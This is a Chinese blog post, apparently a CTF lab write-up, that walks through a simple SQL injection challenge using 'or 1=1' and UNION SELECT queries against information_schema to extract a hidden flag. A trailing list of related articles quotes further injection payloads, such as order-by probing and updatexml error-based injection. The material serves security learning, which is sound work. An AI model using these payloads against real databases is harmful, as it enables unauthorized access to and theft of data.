CTF 简单sql

最新推荐文章于 2024-05-11 22:43:45 发布
最新推荐文章于 2024-05-11 22:43:45 发布
阅读量1.2k 收藏
点赞数
分类专栏: 安全 CTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43559371/article/details/97312816
版权

在这里插入图片描述
针对网络安全实验室 注入关该题,写一下自己的思路
在这里插入图片描述
打开页面 发现就一句话,那就查看下网页源代码,不查不知道,一查吓一跳,他直接告诉我们做题的思路,就是最古老的手工注入
因为他这里告诉我们 id=1,我觉得他给我们的提示,id不重要,而是后边的话重要,直接告诉我们,类似于这种题,应该怎么做。
好了 ,进入正题
那我们就开始:
那我们就在url 网址中去试,看看他有几个字段,当我们让id=4时,发现为空白网页,说明有三个字段
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
当我们在第三个字段中,他告诉我们,flag就在这里,那说明有隐藏内容我们需要把他查询查来
在 id=3的后边直接输入 or 1=1 然后我们就查询出flag
这相当于 select语句的 select * 在该字段中查询出所有内容,这是第一种做法
在这里插入图片描述第二种做法:
我们知道 有三个字段,flag 肯定藏在 某个数据库中的某个表中
那我们就想查询出他的数据库
在这里插入图片描述
通过语句 union select 1,database(),3
查询出他的数据库名字是mydbs
那我们就需要在该数据库中查询他在哪种表中
union select 1,table_name,3 from information_schema.tables where table_schema=‘mydbs’
查询出在该数据库下有那张表
sae_user_sqli3

一般都把所有数据库的信息 都放在一个叫 information_schema中
然后在该表中查出他表中的内容
union select 1,column_name from information_schema.columns where table_schema=‘mydbs’ and table_name=‘sae_user_sqli3’

在这里插入图片描述
发现他表中的字段有 id title content
然后我们就挨个查询 每个字段的内容,发现在第三个字段中,找到flag
union select 1,2,content from sae_user_sqli3

皮皮皮皮皮皮皮皮虾
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf刷题笔记之sql注入-union注入|bugku CTF:成绩查询
weixin_51614848的博客
08-18 1290
ctf刷题笔记
web 百度杯 ctf 一道简单sql 注入绕过题目 sql
qq_30435981的博客
07-28 1183
进入网页的时候看见这个hint,同时我们可以知道这是需要用ID的值去爆数据库,先用orderby查询表单的数量。 发现代码报错了,先试了下将空格换成/**/ <>发现都不行,最终发现这是需要把orderby和select  这些函数中间用<>隔开,同时试了下,到4就没有回显了。 我们就来爆数据库吧。 发现只有在2中有数据。 得到数据库:sqli。...
CTF-web题之简单SQL注入
qq_25046827的博客
11-24 5093
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定(1)
最新发布
2401_84973175的博客
05-11 808
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
ctf-web-成绩查询
god_001的博客
04-13 1128
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
2017 0CTF simplesqlin
测试
03-30 257
没打0ctf, 但是在看大佬们的writeup的时候发现了这道题。 当时就觉得这个绕过莫名其妙, 不知道是怎么写的过滤。看了几个博客, 好像都不太清楚绕过的原理,就这样测了下就绕过去了。 不过,当看到这题的flag之后,就大概知道为什么在payload之间插入%00这种可以绕过了。flag是flag{W4f_bY_paSS_FOR_CI} 也就是waf bypass for ci, 也就是用了...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
SQL注入漏洞演示源代码
07-15
解压后,我们可能看到一个简单的Web应用,包含HTML表单、PHP脚本或其他服务器端语言,用于处理用户输入并执行SQL查询。通过分析这些脚本,我们可以看到SQL查询是如何被拼接的,以及如何通过注入恶意SQL代码来绕过...
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
Converter编码转换CTF比赛用
07-12
4. **安全实践**:在实际应用中,了解编码和解码的原理有助于防止安全漏洞,例如防止SQL注入、XSS攻击等。 "Converter.exe"作为该工具的可执行文件,很可能是Windows平台的应用程序,用户可以直接运行进行编码转换...
常规的CTF题目解析.pdf
08-07
中级的题目就是在入门的基础上稍微添加了难度,并且加了不少坑,题目远远没有你看上去那么简单。比如在在上传图片竟然含有SQL注入?http://127.0.0.1:12345/img.php?file=1.jpg中竟然不是文件包含漏洞?这不科学。 ...
CTFSQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
CTF刷题总结(1)------简单SQL注入
qq_45047250的博客
04-25 1300
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
kali linux渗透测试 第二章(2)sql简单绕过处理(ctf题目实例)
maluxiao123的博客
08-12 618
实验环境为win2003+phpstudy+php+mysql 要利用sql漏洞读取/tmp/360/key的文件,进入答题后发现会直接返回sql语句 在域名上我们可以看到有id=1的字符输入空格union空格select后返回如下 发现空格和union都没有显示,说明字符被过滤掉了,这时候我们就需要进行绕过,绕过的方式有改变大小写(如union->Union),双写(uniunionon在关键字中任意位置再插入一个),url编码(union-->%75%6E%69%6F%6.
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3998
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
CTF学习笔记——[BJDCTF2020]Easy MD5
Obs_cure的博客
08-18 664
一、[BJDCTF2020]Easy MD5 1.题目 2.解题步骤 题目是一个简简单单查询框。因为太忙好久没做题,之前某次试水看了一次WP,记得是在响应头有信息,摸过来看一下 这里一句SQL提示了注入的信息,首先是进行了MD5的运算 他会将输入的字符串进行原始的16字符二进制格式加密,然后返回结果,之后再向前看,与admin进行比对。 3.总结 4.参考资料 ...
CTF---Web---SQL注入---11---注入列的选择与id的值
qq_22160557的博客
08-01 713
文章目录前言一、题目描述二、解题步骤1、尝试列数2、爆表的两种方式3、爆列、字段三、总结 前言 题目分类: CTF—Web—SQL注入—11—注入列的选择与id的值 一、题目描述 题目:SQL注入 二、解题步骤 1、尝试列数 Step1:尝试列数,1 union select 1,2,3,4# 列数为4列 1 union select 1,2,database(),4# 数据库名为:inject_05 2、爆表的两种方式 Step2:爆表 -1 union select 1,(select grou
CTF练习题[WEB]-成绩查询
weixin_45246254的博客
01-05 1827
https://ctf.bugku.com/challenges/detail/id/84.html?page=4 拿到题目如下 查询处考虑sql注入 查询一下 没有报错信息,直接把请求包丢到sqlmap里面 发现union注入 查看当前数据库 查看数据表 发现f14g表 直接dump 获得flag ...
CTF-web】bugku-成绩查询(sql注入)
Sankkl1的博客
08-17 577
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
ctf sql注入题目
09-15
这是一道较为简单SQL注入题目,提供了一个特定的注入点,要求参与者利用SQL注入漏洞获取特定的信息或完成特定的任务。 2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值